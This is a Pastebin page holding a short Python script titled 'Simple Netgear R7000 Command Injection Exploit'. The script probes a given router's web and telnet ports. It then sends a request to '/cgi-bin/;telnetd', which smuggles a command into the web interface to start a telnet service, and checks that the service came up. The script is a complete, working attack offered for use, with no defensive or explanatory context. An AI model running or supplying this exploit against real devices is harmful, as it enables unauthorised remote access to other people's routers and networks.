SHARE
TWEET

Simple Netgear R7000 Command Injection Exploit

The_Defalt Dec 25th, 2016 203 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! /usr/bin/python
  2.  
  3. import socket
  4. import sys
  5. import requests
  6.  
  7. #This is a pretty simple exploit, not many modules needed!
  8.  
  9.  
  10. if len(sys.argv) != 2:
  11.     print "usage: ./exploit [TARGET]"
  12.     sys.exit(1)
  13.  
  14. host = sys.argv[1]
  15.  
  16. def checkVuln():
  17.     print 'checking host... ',; sys.stdout.flush()
  18.     try:
  19.         s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  20.         result1 = s1.connect_ex((host, 80))
  21.         s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  22.         result2 = s2.connect_ex((host, 23))
  23.         s1.close()
  24.         s2.close()
  25.         if result1 == 0 and result2 != 0:
  26.             print 'done'
  27.         else:
  28.             raise Exception
  29.     except Exception:
  30.         print 'fail'
  31.         sys.exit(1)
  32.  
  33. def exploit():
  34.     print 'attempting exploit... ',; sys.stdout.flush()
  35.     try:
  36.         request = requests.get('http://' + host + '/cgi-bin/;telnetd')
  37.         print 'done'
  38.     except Exception:
  39.         print 'done'
  40.  
  41. def verify():
  42.     print 'verifying exploitation... ',; sys.stdout.flush()
  43.     try:
  44.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  45.         result = s.connect_ex((host, 23))
  46.         s.close()
  47.         if result == 0:
  48.             print 'success!'
  49.         else:
  50.             raise Exception
  51.     except Exception:
  52.         print 'fail'
  53.         sys.exit(1)
  54.  
  55. checkVuln()
  56. exploit()
  57. verify()
RAW Paste Data
Top